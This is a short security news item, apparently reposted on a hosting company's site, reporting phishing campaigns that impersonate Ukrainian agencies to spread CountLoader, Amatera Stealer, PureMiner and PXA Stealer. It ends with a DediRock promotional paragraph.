A recent cybersecurity campaign has been identified, using fraudulent emails that impersonate Ukrainian government agencies to execute phishing attacks. This operation is designed to deliver CountLoader, a malware that subsequently installs Amatera Stealer and PureMiner.
According to researchers from Fortinet FortiGuard Labs, these phishing emails contain malicious Scalable Vector Graphics (SVG) files, enticing recipients to open harmful attachments. The documented attack sequences highlight how SVG files trigger the download of a password-protected ZIP file, which contains a Compiled HTML Help (CHM) file. Once opened, this CHM file initiates a series of actions leading to the deployment of CountLoader, disguised as a notification from the National Police of Ukraine.
CountLoader has been noted for distributing various payloads, including Cobalt Strike and PureHVNC RAT among others. In this case, it serves to deliver Amatera Stealer, a variant of ACRStealer, alongside PureMiner, a stealthy cryptocurrency miner.
Amatera Stealer, upon execution, gathers system information, captures files based on specific extensions, and extracts data from Chromium and Gecko-based browsers as well as applications like Steam and Telegram. Fortinet stressed that the sophistication of this phishing campaign showcases how SVG files can be weaponized to launch malware infections.
Additionally, another phishing effort has emerged from a Vietnamese-speaking threat actor utilizing emails with copyright infringement themes to induce recipients to download ZIP archives that ultimately deploy PXA Stealer, further complicating the infection landscape. Security researcher James Northey commented on the evolution of these attacks, noting the increasing complexity and professionalism behind the malware being deployed, which suggests a serious, maturing threat actor on the rise.
The continuous development of these tactics illustrates a pressing need for elevated awareness and proactive defenses against such sophisticated cyber threats.
Welcome to DediRock, your trusted partner in high-performance hosting solutions. At DediRock, we specialize in providing dedicated servers, VPS hosting, and cloud services tailored to meet the unique needs of businesses and individuals alike. Our mission is to deliver reliable, scalable, and secure hosting solutions that empower our clients to achieve their digital goals. With a commitment to exceptional customer support, cutting-edge technology, and robust infrastructure, DediRock stands out as a leader in the hosting industry. Join us and experience the difference that dedicated service and unwavering reliability can make for your online presence. Launch our website.